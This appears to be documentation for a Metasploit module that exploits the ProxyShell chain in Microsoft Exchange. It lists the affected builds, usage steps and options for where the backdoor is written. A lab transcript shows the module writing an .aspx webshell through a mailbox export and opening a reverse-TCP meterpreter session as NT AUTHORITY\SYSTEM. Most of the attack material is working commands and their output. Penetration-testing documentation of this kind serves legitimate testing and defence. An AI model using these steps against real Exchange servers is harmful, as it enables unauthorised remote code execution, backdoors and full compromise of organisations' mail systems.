wvu
4.3 KiB
Vulnerable Application
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution).
By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
This vulnerability affects:
- Exchange 2013 CU23 < 15.0.1497.15
- Exchange 2016 CU19 < 15.1.2176.12
- Exchange 2016 CU20 < 15.1.2242.5
- Exchange 2019 CU8 < 15.2.792.13
- Exchange 2019 CU9 < 15.2.858.9
Verification Steps
- Start msfconsole
- Do:
use exploit/windows/http/exchange_proxyshell_rce - Do:
set RHOSTS [IP] - Do:
set EMAIL [EMAIL ADDRESS] - Do:
run
Options
A known email address for this organization. This email address must be to a user with privileges to access the Exchange Management shell.
UseAlternatePath
Use the IIS root dir as alternate path. Default: false
Advanced Options
BackendServerName
Force the name of the backend Exchange server targeted. Default: Automatic
If not set, the automatic method will use an RPC call to detect the backend server FQDN. This is required because the kerberos-authenticated SSRF can only be sent when the FQDN is known.
ExchangeBasePath
The base path where Exchange is installed. Default: C:\Program Files\Microsoft\Exchange Server\V15
ExchangeWritePath
The path where you want to write the backdoor. Default: owa\auth
You can for example, set it to: ecp\auth
IISBasePath
The base path where IIS wwwroot directory is. Default: C:\inetpub\wwwroot
IISWritePath
The path where you want to write the backdoor. Default: aspnet_client
MapiClientApp
This is MAPI client version sent in the request.
Scenarios
Exchange 2016 CU 19 on Server 2016
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOSTS 192.168.159.42
RHOSTS => 192.168.159.42
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL smcintyre@exchg.lan
EMAIL => smcintyre@exchg.lan
msf6 exploit(windows/http/exchange_proxyshell_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Attempt to exploit for CVE-2021-34473
[*] Retrieving backend FQDN over RPC request
[*] Internal server name: win-bpid95acq7e.exchg.lan
[*] Sending autodiscover request
[*] Server: cccb94e0-3175-4ec9-8e8a-62679d874384@exchg.lan
[*] LegacyDN: /o=Target Org/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=508ce51c27b544b38c33df31f99d3118-smcintyre
[*] Sending mapi request
[*] SID: S-1-5-21-2800676829-2777257591-1686523126-1000 (smcintyre@exchg.lan)
[*] Assigning the 'Mailbox Import Export' role
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Waiting for the export request to complete...
[+] The mailbox export request has completed
[*] Triggering the payload
[*] Sending stage (200262 bytes) to 192.168.159.42
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\UhonV8RZ.aspx
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.42:6787) at 2021-08-17 17:32:26 -0400
[*] Removing the mailbox export request
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-BPID95ACQ7E
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : EXCHG
Logged On Users : 6
Meterpreter : x64/windows
meterpreter >